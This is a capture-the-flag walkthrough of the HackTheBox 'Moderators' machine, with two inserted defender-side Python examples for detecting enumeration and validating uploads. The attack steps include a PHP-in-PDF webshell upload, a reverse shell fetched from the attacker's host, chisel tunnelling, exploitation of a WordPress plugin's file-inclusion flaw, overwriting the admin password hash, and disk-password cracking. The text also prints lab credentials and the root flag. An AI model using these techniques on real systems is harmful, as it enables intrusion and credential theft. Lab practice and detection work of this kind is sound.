HTB - Moderators [Hard]
Scanning
> TARGET=10.129.129.9 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Moderators
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
cors scan
> corscanner -v -u http://10.129.129.9/
> echo http://10.129.129.9/ | ~/go/bin/ucors
dirsearch
> dirsearch -u http://10.129.129.9/ -x 401,302,403
[19:24:05] 200 - 11KB - /about.php
[19:24:47] 200 - 10KB - /contact.php
[19:24:49] 301 - 310B - /css -> http://10.129.129.9/css/
[19:25:07] 301 - 313B - /images -> http://10.129.129.9/images/
[19:25:07] 200 - 0B - /images/
[19:25:08] 200 - 11KB - /index.php
[19:25:08] 200 - 11KB - /index.php/login/
[19:25:17] 301 - 311B - /logs -> http://10.129.129.9/logs/
[19:25:17] 200 - 0B - /logs/
fuzzing report
- By fuzzing report ids, I found multiple reports
> wfuzz -c -z range,0-9999 -u "http://10.129.129.9/reports.php?report=FUZZ" --hh 7888
- Found several interesting entries
* http://10.129.129.9/reports.php?report=2589
* http://10.129.129.9/reports.php?report=3478
* http://10.129.129.9/reports.php?report=4221
* http://10.129.129.9/reports.php?report=7612
* http://10.129.129.9/reports.php?report=8121
- One of them shows an interesting path: the log directory name is the md5sum of the report id
* http://10.129.129.9/reports.php?report=9798
[+] Domain : bethebest101.uk.htb
[+] Vulnerability : Sensitive Information Disclosure
[+] Impact : 3.5/4.0
[+] Disclosed by : Karlos Young
[+] Disclosed on : 11/19/2021
[+] Posted on :
[+] Approved :
[+] Patched : NO
[+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/
e21cece511f43a5cb18d4932429915ed is md5(9798)
> echo -n 9798 | md5sum
- Then, we can use this method to find the other valid paths
> wfuzz -c -z range,0-9999,md5 -u "http://10.129.129.9/logs/FUZZ/" --hh 274
000002590: 200 0 L 0 W 0 Ch "743c41a921516b04afde48bb48e28ce6"
000003479: 200 0 L 0 W 0 Ch "b071cfa81605a94ad80cfa2bbc747448"
000004222: 200 0 L 0 W 0 Ch "74d90aafda34e6060f9e8433962d14fd"
000007613: 200 0 L 0 W 0 Ch "ce5d75028d92047a9ec617acb9c34ce6"
000008122: 200 0 L 0 W 0 Ch "afecc60f82be41c1b52f6705ec69e0f1"
000009799: 200 0 L 0 W 0 Ch "e21cece511f43a5cb18d4932429915ed"
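As an added defender-side example (not part of the writeup), the detection logic below runs over constructed Apache access-log lines and flags the two enumeration patterns shown above: a client sweeping sequential report ids on reports.php, and a client probing many /logs/<md5>/ directories. The thresholds, the sample log and the client addresses are my assumptions.

```python
import re
from collections import defaultdict

# Apache combined-log prefix: client, ident, user, [time], "METHOD PATH PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REPORT_RE = re.compile(r'^/reports\.php\?report=(\d+)$')
LOGDIR_RE = re.compile(r'^/logs/([0-9a-f]{32})/?$')

def parse(line):
    """Return (client_ip, path, status) or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, path, status = m.groups()
    return ip, path, int(status)

def detect_enumeration(lines, id_threshold=20, dir_threshold=5):
    """Flag clients that request many distinct report ids or probe many
    /logs/<hash>/ directories. Status codes are deliberately ignored:
    reports.php answers 200 for unknown ids, so a 404-rate alert misses it."""
    report_ids = defaultdict(set)
    dir_probes = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, path, _status = rec
        if m := REPORT_RE.match(path):
            report_ids[ip].add(int(m.group(1)))
        elif m := LOGDIR_RE.match(path):
            dir_probes[ip].add(m.group(1))
    alerts = {}
    for ip in set(report_ids) | set(dir_probes):
        reasons = []
        if len(report_ids[ip]) >= id_threshold:
            reasons.append(f"{len(report_ids[ip])} distinct report ids")
        if len(dir_probes[ip]) >= dir_threshold:
            reasons.append(f"{len(dir_probes[ip])} distinct /logs/<hash>/ paths")
        if reasons:
            alerts[ip] = reasons
    return alerts

# Constructed sample log (not from the box): one scanner sweeping ids 0-29 and
# six hash directories, one ordinary visitor opening two reports.
def _line(ip, path, status):
    return f'{ip} - - [04/Aug/2022:19:30:00 +0000] "GET {path} HTTP/1.1" {status} 7888 "-" "curl"'

SAMPLE_LOG = [_line("198.51.100.7", f"/reports.php?report={i}", 200) for i in range(30)]
SAMPLE_LOG += [_line("198.51.100.7", f"/logs/{n:032x}/", 404) for n in range(6)]
SAMPLE_LOG += [_line("192.0.2.10", "/reports.php?report=2589", 200),
               _line("192.0.2.10", "/reports.php?report=3478", 200)]
```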
- Continued path discovery found other useful folders and files
> dirsearch -u http://10.129.129.9/logs/ -x 404,401,403
[19:44:26] 301 - 315B - /logs/css -> http://10.129.129.9/logs/css/
[19:44:45] 200 - 0B - /logs/index.html
[19:45:37] 301 - 319B - /logs/uploads -> http://10.129.129.9/logs/uploads/
[19:45:37] 200 - 0B - /logs/uploads/
- Two of the log files are downloadable; their content reveals a new path, /logs/report_log_upload.php
> curl -i http://10.129.129.9/logs/ce5d75028d92047a9ec617acb9c34ce6/logs.pdf --output logs.pdf
[06/01/2021] Log file created for report #7612.
[06/01/2021] Report submitted by Shivankar Rumar.
[06/03/2021] Report accepted.
[06/03/2021] LOG file uploaded from /logs/report_log_upload.php
[06/04/2021] Reported to the site administrators.
[06/10/2021] Posting approval sent to the owners.
[06/12/2021] Approval pending......
> curl -i http://10.129.129.9/logs/743c41a921516b04afde48bb48e28ce6/logs.pdf --output logs.pdf
[01/30/2021] Log file created for report #2589.
[01/30/2021] Report submitted by Sharaf Ahamed.
[02/03/2021] Report accepted.
[02/03/2021] LOG file uploaded from /logs/report_log_upload.php
[02/04/2021] Reported to the site administrators.
[02/05/2021] Posting approval sent to the owners.
[02/07/2021] Approval pending......
upload shell
- We can upload PDF files through this form. Initially, however, the upload failed even though I supplied a valid PDF file.
- Later I found that the Content-Type must be application/pdf; as long as that header is set and the file keeps the PDF header shown below, the upload succeeds.
- http://10.129.129.9/logs/report_log_upload.php
%PDF-1.5
<?php echo system('ls'); ?>
%%EOF
http://10.129.129.9/logs/uploads/logs.pdf.php
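As an added example (not the site's code), the Python below models the weak check the writeup describes, which looks only at Content-Type and the %PDF magic, beside a hardened check that would have rejected the same upload; the hardened rules, ALLOWED_EXTENSIONS and storage_name are assumptions of mine.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {"pdf"}
PDF_MAGIC = b"%PDF-"

def weak_accepts(filename, content_type, data):
    """Check modelled on the behaviour the writeup observed: only the
    declared Content-Type and the leading %PDF magic are inspected, and
    the client's filename is kept, so 'logs.pdf.php' is stored as PHP."""
    return content_type == "application/pdf" and data.startswith(PDF_MAGIC)

def hardened_accepts(filename, content_type, data):
    """Defender's check (assumed, not the site's code): exactly one
    extension, taken from an allowlist; magic bytes and Content-Type must
    agree; no PHP open tag anywhere in the body."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_EXTENSIONS:
        return False          # rejects 'logs.pdf.php', '.pdf', 'x.php'
    if content_type != "application/pdf" or not data.startswith(PDF_MAGIC):
        return False
    if b"<?php" in data or b"<?=" in data:
        return False          # a PDF has no business carrying PHP tags
    return True

def storage_name(token=None):
    """Server-chosen name with a fixed extension, so the on-disk name never
    derives from user input. Store outside the web root (or with PHP
    execution disabled for the directory) for defence in depth."""
    return f"{token or secrets.token_hex(16)}.pdf"

# Constructed sample input: the polyglot from the writeup and a benign stub PDF.
POLYGLOT = b"%PDF-1.5\n<?php echo system('ls'); ?>\n%%EOF\n"
BENIGN = b"%PDF-1.5\n%%EOF\n"
```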
There appears to be a filter that disables several PHP functions; weevely is a good tool for working around it.
To use it, start by generating a shell agent:
> python3 weevely.py generate meow meow.pdf.php
- upload the shell agent to the target
- Then, connect to the agent
> python3 weevely.py 'http://10.129.129.9/logs/uploads/meow.pdf.php' meow
- Now you should be able to issue commands on the target, but I uploaded a proper reverse shell because the weevely agent is too slow
> cp /usr/share/webshells/php/php-reverse-shell.php w.php
weevely> wget http://<ip>/w.php
- receive the reverse connection
> python3 -c 'import pty; pty.spawn("/bin/bash")'
PE to lexi
- Enumeration found a script running as the user lexi
root 827 0.0 0.0 8368 3764 ? Ss Aug04 0:00 /usr/sbin/runuser -u lexi /usr/local/sbin/startup.sh
lexi 861 0.0 0.0 2608 532 ? S Aug04 0:00 _ /bin/sh /usr/local/sbin/startup.sh
lexi 865 0.0 0.7 228360 31616 ? S Aug04 0:14 _ /usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/
- The site runs on a local port, 8080
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
- There is a new WordPress site running on 127.0.0.1:8080; to reach it we need to tunnel the traffic
- upload chisel to the target
> chisel server -p 8888 --reverse
> /tmp/chisel client <ip>:8888 R:8080:localhost:8080
We can now browse the site at http://moderators.htb:8080
- Enumerating the plugins under /opt/site.new/wp-content/plugins led me to a public exploit against the brandfolder plugin.
- Examining callback.php confirms it should work: every require_once builds its path from the unvalidated wp_abspath request parameter.
> cat /opt/site.new/wp-content/plugins/brandfolder/callback.php
<?php
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(0);
require_once($_REQUEST['wp_abspath'] . 'wp-load.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/media.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/file.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/image.php');
require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/post.php');
- For some reason, creating the directory under /tmp doesn’t work. But /var/www/html/logs/uploads/wp works
> mkdir -p /var/www/html/logs/uploads/wp/wp-admin/includes
> cd /var/www/html/logs/uploads/wp
> echo '<?php ?>' > wp-admin/includes/media.php
> echo '<?php ?>' > wp-admin/includes/file.php
> echo '<?php ?>' > wp-admin/includes/image.php
> echo '<?php ?>' > wp-admin/includes/post.php
> cp /var/www/html/logs/uploads/w.php /var/www/html/logs/uploads/wp/wp-load.php
- browse to http://moderators.htb:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/ and receive the reverse shell.
- Grab lexi’s id_rsa and get the user flag
pe
- Examine the wp-config.php under /opt/site.new for the DB credentials
> cat /opt/site.new/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', 'wordpresspassword123!!' );
define( 'DB_HOST', 'localhost' );
hijack wp admin
- Log in to the database and find the admin user in wp_users; don't bother cracking the hash, replace it instead.
> mysql -h localhost -u wordpressuser -D wordpress -p'wordpresspassword123!!'
MariaDB [wordpress]> select * from wp_users;
admin | $P$BXasOiM52pOUIRntJTPVlMoH0ZlntT0
> UPDATE `wp_users` SET `user_pass`='$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0' WHERE user_login='admin';
- You can pivot more easily using ssh now (if you prefer)
> ssh -L 8080:localhost:8080 -i lexi.id_rsa lexi@10.129.129.9
PE: john
- Log in to wp admin and check the password manager plugin: http://moderators.htb:8080/wp-admin/admin.php?page=pms_menu
- Now, since we have john's ssh key, we can log in as john
carl@moderators.htb:Carl@thebest**
vdi cracking
- In /home/john, there is a ~/stuff/VBOX folder containing a VirtualBox backup
- Download both files and crack the password
> python3 ~/tools/pyvboxdie-cracker/pyvboxdie-cracker.py -v 2019-08-01.vbox -d ~/tools/pyvboxdie-cracker/wordlist.txt
Starting pyvboxdie-cracker...
[*] Encrypted drive found : F:/2019.vdi
[*] KeyStore information...
Algorithm = AES-XTS256-PLAIN64
Hash = PBKDF2-SHA256
Final Hash = 5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f
[*] Starting bruteforce...
2 password tested...
50 password tested...
62 password tested...
[*] Password Found = computer
> python3 virtualbox2hashcat.py --vbox 2019-08-01.vbox
$vbox$0$540000$546291a6074943b096ea80db2ae39d4179de6d1c3f17ea25d62e627abfa7fbcb$16$a386a5432e938f20c8fbc9af460a78c1790c19abd1c51e9c0be724939c9481586180fc4a34135d8481e436d8c132b8f4b9a550de4b248300ba32b18b645865d6$20000$e9608bcdd8c070868859a31c9f1e5e5de98b5ead8c21f25c0c43ee697816e32c$5442057bc804a3a914607decea5574aa7038cdce0d498c7fc434afe8cd5b244f
- install virtualbox on windows
- move 2019.vdi and 2019-08-01.vbox to a folder
- update 2019-08-01.vbox with correct path
- double click 2019-08-01.vbox to import the vm
- open the vm setting
- In harddisk, remove Ubuntu
- in the 2019-08-01.vbox file, remove
<HardDisk uuid="{5999a8f0-e31d-4d4e-937d-173eb6ba8881}" location="Ubuntu.vdi" format="VDI" type="Normal"/>
In disk encryption, un-tick encryption and enter the password
computer
now we should have a decrypted disk 2019.vdi
Download an Ubuntu ISO and boot the VM from it
In the boot screen, select "Try Ubuntu"
You will find the 2019.vdi disk is still encrypted; trying to mount it gives an unknown filesystem type 'crypto_LUKS' error
> sudo mount /dev/sda /tmp
mount: /tmp: unknown filesystem type 'crypto_LUKS'
- Use this tool to crack it: https://github.com/Diverto/cryptsetup-pwguess/releases/tag/v1.0.0 (bruteforce-luks-static-linux-amd64)
- Use the same wordlist from pyvboxdie-cracker
> sudo ./bruteforce-luks-static-linux-amd64 -f wordlist.txt /dev/sda
The password is abc123
Mount the 2019.vdi disk, opening it with that password
The file scripts/all-in-one/distro_update.sh on the disk contains john's password
PE: john -> root
- john’s password:
$_THE_best_Sysadmin_Ever_
john@moderators:~/stuff/VBOX$ sudo -l
[sudo] password for john:
Matching Defaults entries for john on moderators:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on moderators:
(root) ALL
john@moderators:~/stuff/VBOX$ sudo su
root@moderators:/home/john/stuff/VBOX# id
uid=0(root) gid=0(root) groups=0(root)
root@moderators:/home/john/stuff/VBOX# cat /root/root.txt
bcf0fec9b0aaf3afe31c19782c71897b